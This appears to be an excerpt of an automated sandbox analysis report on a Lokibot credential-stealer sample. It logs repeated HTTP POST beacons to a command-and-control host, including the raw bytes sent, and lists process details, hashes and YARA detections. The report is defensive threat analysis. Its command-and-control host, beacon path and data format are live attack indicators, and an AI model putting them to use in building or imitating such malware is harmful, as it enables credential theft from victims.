Jun 9, 2022 12:20:18.321571112 CEST	9163	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r0SVCd1aYAL6UnN7kzC9kSKCpRIc2QlMm6uEDvMRg9KzKi1NjHwwa%2FuotvsZaR%2FvIpdZGiL%2BL7buVgBrTTkE3JHyNk3svlvfY6UniqSEORDAlzLcFYMcfe99BKAx4u9klmRvHXU6e0KmBGNjsfSMvzeg1YT5%2BFsE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71892245c89c9217-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.3	49819	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:19.468605995 CEST	9166	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:19.485657930 CEST	9167	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:19.651838064 CEST	9167	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3qVDcRUABdl1jxhpLhwSZbhAfOoeZHRuBM0ZRi7ug5vnbxTChD%2FKYZSMrr6pnYmUNjQnsWX1jbFgP0WYdc0TK9xieQiSDt7gnYLXn15ZxhN%2FRpZn2yADxpjEuOeV9qJx93y29%2BW6ygHoQr7dGIyxIAI2AQpXyaV8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189224db90a6919-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.3	49820	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:20.867616892 CEST	9168	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:20.884880066 CEST	9169	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:21.059680939 CEST	9169	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3cXCQ1sYsTaywZlxmhZSkvs85xjKQxR5Pb3Swf1U4aHr1VG9mnFMvZTr5YAzokKPMDNCSCbBfEvUfiNMyV5Fx7v2C9VzwIAeE8z45qw05Bjb%2FV8Wbi%2BencNN9fAMiy%2Bumzk2pJgtz%2Fq8v2OtqxX%2BSkSiSjP3TAi6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718922567ac29bfe-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.3	49824	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:22.688766956 CEST	9176	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:22.705862999 CEST	9177	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:22.830317020 CEST	9182	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IjUoZM1m0%2FKH1UL5UdNQdTQdop%2Fl3pJfEVUm7ELrs9HHHizfoar8GLPuFD6WHcBwijHHUjXNu2B9H7mpr5kuNm02hSxptILPrYj%2BLt6%2Bd%2BVpEzo7DeXclLol71P8AkbdbyG5E9Ete69UAQhnk9hh8zIFr5yr%2FIti"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71892261d93f904f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.3	49832	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:23.981117964 CEST	9232	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:23.998447895 CEST	9232	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:24.125456095 CEST	9240	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1Gtbc6oxwMDp6V6YwPHeErViD%2FUnK3oUOLrX7ei7A%2BKDcCKAb2q9MsDAjeTIAXbZI%2FbgdNWVZP8zTO%2BHOeHuGDzyPTivJ12UYURQgTcizY35SnFjIKO%2FEukKwk9mPJZgGkBW2WS8pOYRN8iPD3CgYG0k77aHnMee"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71892269fbed912a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.3	49839	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:25.206676006 CEST	9292	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:25.223875999 CEST	9292	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:25.361783028 CEST	9294	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f%2Bhr9k9VS6Sgac5o8jUx7xbpN1Z7Fcsd0JIgG7qeuu%2FIySRQCPveUmsLdaRUxPhiNkgvTyzFaQU5sfEWnYigE7eCNcr9QzX3eah7yfn5wCQuJhQ44zTgpin0AM5KCU86P%2FeezQn4XgtEESHlso4AP4H7wJB5skAS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718922719f506961-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.3	49844	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:27.377021074 CEST	9413	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:27.393836975 CEST	9414	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:27.494107008 CEST	9419	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wsMD7VEqGSudLPodNYQtoLTtXDHBhUbxcHIzl19sNYUwLTNRKDWvrtQV%2Fg3ZKexiM4SKunaqMzdpIMZl4OSseJErjHh%2BFObqqb%2Ftd6Cko3heLRa5ou%2BKxzy73oMRmYhSsW9Ii67jRMbt%2B2I7qFCDpDmQhqsdQQUA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189227f1ab99b6a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.3	49851	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:20:29.327641010 CEST	9639	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:20:29.346561909 CEST	9639	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:20:29.443782091 CEST	9640	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:20:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p%2FefmyEcaSbXrWN8R%2BSwGavmj3iobA00Fe%2FI4YPdZQVvCf8ELOXyH7Or4LtRHtLj4%2BNA0FEtt6S120z6pPFHdoAfyJ1x8MA56CHvo2jO2L2tlnnuF8aBX842dU%2FXqdXjFLIQ2nHtvfM%2BHgX4hnHbt8ZDCfca2lrN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189228b5dfc9bc2-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49764	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:02.212367058 CEST	1320	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:02.229402065 CEST	1320	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:02.588592052 CEST	1321	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Cu%2BMdCCyKAnHdfvXBMuXzM9RYuSiORLzv0vY6CBBr2eldsUINwTcCdjcxDwE7wrCCLwqE%2FKH78mXNYQ%2FcO582%2FuCHfc%2B7YUIi4aIUcGJ4nbsU%2F4XiN0%2BszMOnglewUM9k6FUz6dsVCcEXl8UyHnARryUr7coumHk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189206adf119018-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49765	188.114.97.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:04.748877048 CEST	1322	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:04.765901089 CEST	1323	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:04.892672062 CEST	1323	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yY2w6heR4mRduHrREJouCQA%2BdCGt2%2F%2FmporAmegdUA4k6pppNcWWeQ23XyNQq2pEYwvdK6Zc7vsvZEtPNoPy91oCBpF6RiusS1TRMBDJa6kjPNVMpC0NNyN8fSziudkGoRuyQvLR3GelKGNlCa0N324HRSGwx6%2BE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189207ab94f9b6e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49766	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:06.967493057 CEST	1325	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:06.984461069 CEST	1325	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:07.076062918 CEST	1326	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y6YSAVSy8cBfmAk2QA0lWZWilRZiQs1K%2Bh9hfPDC%2Bi2NtGXcFXlKxkrYYkI4aBPzJuBIOwdvaPjoWHJQx5Z3KoBy%2BWvQjP9%2FQiRTSejz3KgKVGL4BKqfVjHOZSPTx6PAU4GJMOXz6BLbLxAjQJ8yEOgP4VJigzHu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920889c1a8fe8-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49767	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:08.800960064 CEST	1327	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:08.819365978 CEST	1327	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:08.912668943 CEST	1328	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b8MSANTLhY57IQV5J%2Bq590SFAfa8mPX9bdt%2BfyIrKU7C0awryNvP3xwGX6x7QIGXcC0HLmQNruTuvptf2LjRJLf15rv0sPOii6n6hw7PxtAYlfdDSOmfz%2FJDqq%2BqnO2J9XvQj%2Bv5lLWrgYTt4hogaa%2FlhDBTk2r4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920940b299b63-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49768	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:10.383861065 CEST	1329	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:10.401235104 CEST	1329	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:10.548271894 CEST	1330	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bAa7lUP%2FtW8e0N4iGeDxKN5WLMDXFEbBR4a%2BhSchxSKv3qjY3N30mbXOirJsCF0mmbIzYRf00TmslYFDRahcustp8iJpnkiwDmhd%2BIVej2BPYxWXpnt0dskmGqGV%2BWq2jp35GhqGVyLGhZXJG3G3vAJx%2BPwAboIb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189209defea9b31-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ZciowjM9hN.exePID: 6328, Parent PID: 4180

General

Target ID:	0
Start time:	12:18:20
Start date:	09/06/2022
Path:	C:\Users\user\Desktop\ZciowjM9hN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZciowjM9hN.exe"
Imagebase:	0x810000
File size:	621056 bytes
MD5 hash:	4015330DA10DE30BCDF2B65F7F98BAEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.323829302.0000000007470000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.319718686.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ZciowjM9hN.exePID: 6976, Parent PID: 6328

General

Target ID:	9
Start time:	12:18:40
Start date:	09/06/2022
Path:	C:\Users\user\Desktop\ZciowjM9hN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ZciowjM9hN.exe
Imagebase:	0xec0000
File size:	621056 bytes
MD5 hash:	4015330DA10DE30BCDF2B65F7F98BAEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
